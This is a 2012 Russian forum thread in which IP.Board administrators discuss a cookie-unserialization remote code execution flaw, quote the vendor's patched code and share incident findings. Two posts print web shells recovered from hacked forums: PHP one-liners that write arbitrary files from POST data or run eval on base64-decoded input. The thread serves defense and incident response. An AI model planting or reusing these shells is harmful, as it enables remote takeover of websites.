Security update - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

СвернутьПрикрепленные теги

вирус ipb обновления безопасности

  • 16 Страниц +
  • 1
  • 2
  • 3
  • Последняя »
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

Security update

#1 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 03 Ноябрь 2012 - 00:40

ИБРовцы похоже еще спят http://forums.ibreso...p?/topic/64826/ :)
если прошурстить у них в /cache/ наверняка и шелл найдется)

Патчи от 6 ноября 2012 для ИБР версий
http://ipbskins.ru/f...dpost__p__70490
1

#2 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 03 Ноябрь 2012 - 10:00

Что-то так лениво обновлять все форумы...

А в IBR работают мудаки - запихали свои функции в core.php, и этим добились несовместимости своего дистрибутива с английским. Положили бы свои сео-функции в constants.php, а переназначение ЧПУ - сделали бы хуком, и такой проблемы не было бы, и совместимость была бы полная.
2

#3 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 03 Ноябрь 2012 - 10:37

Насколько я вижу, алгоритм простейший. В старом методе get класса IPSCookie выполнялось userialize для cookie, если она начиналась с 'a:'. Если подсунуть в cookie сериализованный объект, он разворачивался в инстанс, и код конструктора выполнялся. По сути это уязвимость вида "remote code execution" - очень серьезная дыра. Проблему решили добавлением проверки на наличие объекта в составе упакованного объекта - метод safeUnserialize в составе класса IPSLib:
	/**
	* mixed safe_unserialize(string $serialized)
	* Safely unserialize, that is only unserialize string, numbers and arrays, not objects
	*
	* @license Public Domain
	* @author dcz (at) phpbb-seo (dot) com
	*/
	static public function safeUnserialize( $serialized )
	{
		// unserialize will return false for object declared with small cap o
		// as well as if there is any ws between O and :
		if ( is_string( $serialized ) && strpos( $serialized, "\0" ) === false )
		{
			if ( strpos( $serialized, 'O:' ) === false )
			{
				 // the easy case, nothing to worry about
				 // let unserialize do the job
				 return @unserialize( $serialized );
			 }
			 else if ( ! preg_match('/(^|;|{|})O:[0-9]+:"/', $serialized ) )
			 {
				 // in case we did have a string with O: in it,
				 // but it was not a true serialized object
				 return @unserialize( $serialized );
			 }
		 }

		 return false;
	}


Эту проверку внедрили в метод get:
    /**
	 * Get a cookie.
	 * Abstract layer allows us to do some checking, etc
	 *
	 * @param	string		Cookie name
	 * @return	mixed
	 * @since	2.0
	 */
   	static public function get($name)
	{
		/* Check internal data first */
		if ( isset( self::$_cookiesSet[ $name ] ) )
		{
			return self::$_cookiesSet[ $name ];
		}
    	else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
    	{
			$_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];

    		$_couldBeSerialized = stripslashes( urldecode( $_value ) );

    		if ( substr( $_couldBeSerialized, 0, 2 ) == 'a:' )
    		{ 
				return IPSLib::safeUnserialize( $_couldBeSerialized );
    		}
    		else
    		{
				return IPSText::parseCleanValue( urldecode( $_value ) );
    		}
    	}
    	else
    	{
    		return FALSE;
    	}
    }

2

#4 Пользователь не на сайте   Fisana ответил: »

 
 
  • На PM не отвечаю
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 13 190
  • Регистрация: 21-Ноябрь 05
  • Репутация: 695
  • Откуда:Из интернетов
  • IPB version:3.1.x
 

Отправлено 03 Ноябрь 2012 - 12:49

Нас пропатчила только что английским патчем
0

#5 Пользователь не на сайте   Fisana ответил: »

 
 
  • На PM не отвечаю
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 13 190
  • Регистрация: 21-Ноябрь 05
  • Репутация: 695
  • Откуда:Из интернетов
  • IPB version:3.1.x
 

Отправлено 03 Ноябрь 2012 - 12:54

Возможно, нас тоже пытались ломать.
0

#6 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 06 Ноябрь 2012 - 11:05

Нда, посмотрел на пару школо-форумов, все поголовно с шеллами, на некоторых целый букет. Похоже уже начали ломать на автомате.
1

#7 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 06 Ноябрь 2012 - 11:20

Подтверждаю. Один форум не пропатчил - десяток шеллов на нем уже лежит. Довольно серьезная дыра, создающая множество проблем.

Подобные проблемы заставляют задуматься об отказе от использования IP.Board...
0

#8 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 06 Ноябрь 2012 - 13:09

Вот такие вот шеллы дропают:

d19d8a81069d77af4fccda594ddef321.php
==============================================================================
 URL: /index.php/index.php
 Date: Mon, 05 Nov 2012 20:31:41 +0000
 IP Address: 74.208.213.252
 Time Taken: 0.00022
 <?php print(md5(123456));echo file_put_contents($_POST[f],$_POST[b]); ?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================


37b5d35ddc8dd39b62ecfc0025fefb58.php
==============================================================================
 URL: /index.php/forums/index.php
 Date: Mon, 05 Nov 2012 20:32:02 +0000
 IP Address: 74.208.213.252
 Time Taken: 0.00021
 <?php print(md5(123456));echo file_put_contents($_POST[f],$_POST[b]); ?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================


Явно автобот работает.
0

#9 Пользователь не на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 706
  • Регистрация: 20-Март 09
  • Репутация: 2 264
  • IPB version:3.1.x
 

Отправлено 07 Ноябрь 2012 - 05:18

Еще один патч http://community.inv...-november-2012/
1

#10 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 10:14

Поступили кардинально. Вместо serialize/unserialize задействовали json_encode и json_decode. Чтобы применить патчи на русской версии, надо скачать английскую версию core.php, скопировать из нее и целиком заменить в русской класс:
/**
* IPSCookie
*
* This deals with saving and writing cookies
*/
class IPSCookie
{
...


Второй файл можно смело перезаписывать.
1

#11 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 10:25

Вынесу тему в паблик, пожалуй. Тут ничего такого нет, а мне удобно ссылку давать.
0

#12 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 10:54

Это просто жесть какая-то. На всех форумах, к которым у меня есть доступ, есть /cache/ - шелл.

Видимо, стремительно прошла вторая волна, уже обходящая первый патч. Вот спасибо IPS за счастливое детство. Закрываю все свои IP.Board форумы на карантин.
0

#13 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 11:05

В большинстве случаев просто дропнули шелл и пошли дальше. Видимо, ботнет собирают.
0

#14 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 11:13

Вариации шеллов:

/cache/cx.php
==============================================================================
 URL: /index.php/
 Date: Tue, 06 Nov 2012 12:48:48 +0000
 IP Address: 195.182.194.223
 Time Taken: 0.00022

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================
==============================================================================
 URL: /index.php/
 Date: Tue, 06 Nov 2012 12:48:48 +0000
 IP Address: 195.182.194.223
 Time Taken: 0.00021

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================


/cache/cache.php
==============================================================================
=========================        END       ===================================
========================= /index.php?%3C?error_reporting(0);print(___);eval(base64_decode($_POST[HTTP]));die;?%3E ===================================
==============================================================================

0

#15 Пользователь не на сайте   Ritsuka ответил: »

 
 
  • ***
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 1 908
  • Регистрация: 08-Июнь 09
  • Репутация: 531
  • IPB version:3.4.x
 

Отправлено 08 Ноябрь 2012 - 11:15

Всплывает старая истина: запрет на web-доступ к /cache/ - всегда хорошая идея)
0

Сообщить об этой теме:


  • 16 Страниц +
  • 1
  • 2
  • 3
  • Последняя »
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна